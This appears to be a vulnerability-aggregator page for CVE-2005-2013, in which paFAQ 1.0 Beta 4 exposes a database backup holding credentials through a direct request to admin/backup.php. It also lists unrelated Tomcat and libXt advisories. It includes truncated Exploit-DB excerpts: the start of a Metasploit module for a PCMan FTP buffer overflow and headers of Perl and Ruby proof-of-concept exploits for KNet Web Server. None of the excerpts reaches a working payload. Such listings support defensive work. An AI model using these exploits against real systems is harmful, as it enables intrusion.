CVE-2005-2013
Published 2005-06-20
CVE-2005-2013: paFAQ 1.0 Beta 4 allows remote attackers to obtain sensitive information via a direct request to admin/backup.php, which contains a backup of the database…
Priority P4 · 16 · medium · 5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:N/A:N
EPSS: 1.34% (67.8th percentile)
paFAQ 1.0 Beta 4 allows remote attackers to obtain sensitive information via a direct request to admin/backup.php, which contains a backup of the database including usernames and passwords.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php_arena | pafaq | — | — |
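CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |
| ghsa | — | 4.3 | MEDIUM | — |
| vendor_redhat | — | 6.8 | MEDIUM | — |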
GHSA
Apache Tomcat is vulnerable to HTTP request-smuggling
ghsa·2022-05-14·CVSS 4.3
CVE-2013-4286 [MEDIUM] CWE-20 Apache Tomcat is vulnerable to HTTP request-smuggling
Apache Tomcat before 6.0.39, 7.x before 7.0.47, and 8.x before 8.0.0-RC3, when an HTTP connector or AJP connector is used, does not properly handle certain inconsistent HTTP request headers, which allows remote attackers to trigger incorrect identification of a request's length and conduct request-smuggling attacks via (1) multiple Content-Length headers or (2) a Content-Length header and a "Transfer-Encoding: chunked" header. NOTE: this vulnerability exists because of an incomplete fix for CVE-2005-2090.
GHSA
GHSA-q768-g46g-x66p: paFAQ 1
ghsa_unreviewed·2022-05-01
CVE-2005-2013 [MEDIUM] GHSA-q768-g46g-x66p: paFAQ 1
paFAQ 1.0 Beta 4 allows remote attackers to obtain sensitive information via a direct request to admin/backup.php, which contains a backup of the database including usernames and passwords.
Red Hat
tomcat: multiple content-length header poisoning flaws
vendor_redhat·2014-02-25·CVSS 4.3
CVE-2013-4286 [MEDIUM] tomcat: multiple content-length header poisoning flaws
Apache Tomcat before 6.0.39, 7.x before 7.0.47, and 8.x before 8.0.0-RC3, when an HTTP connector or AJP connector is used, does not properly handle certain inconsistent HTTP request headers, which allows remote attackers to trigger incorrect identification of a request's length and conduct request-smuggling attacks via (1) multiple Content-Length headers or (2) a Content-Length header and a "Transfer-Encoding: chunked" header. NOTE: this vulnerability exists because of an incomplete fix for CVE-2005-2090.
It was found that when Tomcat / JBoss Web processed a series of HTTP requests in which at least one request contained either multiple content-length headers, or one content-length header with a chunked transfer-encoding header, Tomc
Red Hat
libXt: Memory corruption due to unchecked use of unchecked function pointers
vendor_redhat·2013-05-23·CVSS 6.8
CVE-2013-2005 [MEDIUM] CWE-392 libXt: Memory corruption due to unchecked use of unchecked function pointers
X.org libXt 1.1.3 and earlier does not check the return value of the XGetWindowProperty function, which allows X servers to trigger use of an uninitialized pointer and memory corruption via vectors related to the (1) ReqCleanup, (2) HandleSelectionEvents, (3) ReqTimedOut, (4) HandleNormal, and (5) HandleSelectionReplies functions.
A flaw was found in the way the X.Org X11 libXt runtime library used uninitialized pointers. A malicious X11 server could possibly use this flaw to execute arbitrary code with the privileges of the user running an X11 client.
Statement: This issue affects the libXt package in Red Hat Enterprise Linux 5. Red Hat Product Security has rated this issue as having Moderate security impact.
No detection rules found.
Exploit-DB
PCMan FTP Server 2.0.7 - Remote (Metasploit)
exploitdb·2013-07-22
CVE-2013-4730 PCMan FTP Server 2.0.7 - Remote (Metasploit)
---
# Exploit-DB Note: Ret needs adjustment for Windows XP SP3 English
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 'PCMan\'s FTPD V2.0.7 Username Overflow',
'Description' => %q{
This module exploits a buffer overflow found in the USER command
of PCMan's FTPD.
},
'Author' => 'MSJ ',
'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Payload' =>
{
'Space' => 2005,
'BadChars' => "\x53\x93\x42\x7E",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
# Target 0
[
'Windows XP SP3 En
Exploit-DB
KNet Web Server 1.04b - Stack Corruption Buffer Overflow
exploitdb·2013-04-12
CVE-2005-0575 KNet Web Server 1.04b - Stack Corruption Buffer Overflow
---
#!/usr/bin/perl
# KNet Web Server Stack corruption BoF PoC
# Written by Wireghoul - http://www.justanotherhacker.com
# Date: 2013/04/11
# Version: 1.04b
# Tested on: WinXP SP3
use IO::Socket::INET;
$host = shift;
$port = shift;
print "KNet Web Server stack corruption BoF PoC - Wireghoul - http://www.justanotherhacker.com\n";
die "Usage $0 \n" unless $host && $port;
$sock = IO::Socket::INET->new("$host:$port") or die "Unable to connect to $host:$port\n";
# Shellcode for calc.exe
Exploit-DB
KNet Web Server 1.04b - Remote Buffer Overflow (SEH)
exploitdb·2013-03-29
CVE-2005-0575 KNet Web Server 1.04b - Remote Buffer Overflow (SEH)
---
#!/usr/bin/ruby
# Exploit Title: KNet Web Server Buffer Overflow SEH
# Date: 2013-03-27
# Exploit Author: Myo Soe, http://yehg.net/
# Software Link: http://www.softpedia.com/progDownload/KNet-Download-20137.html
# Version: KNet 1.04b
# Tested on: Windows 7
require 'net/http'
require 'uri'
require 'socket'
############################################
# bind port 4444
Published: 2005-06-20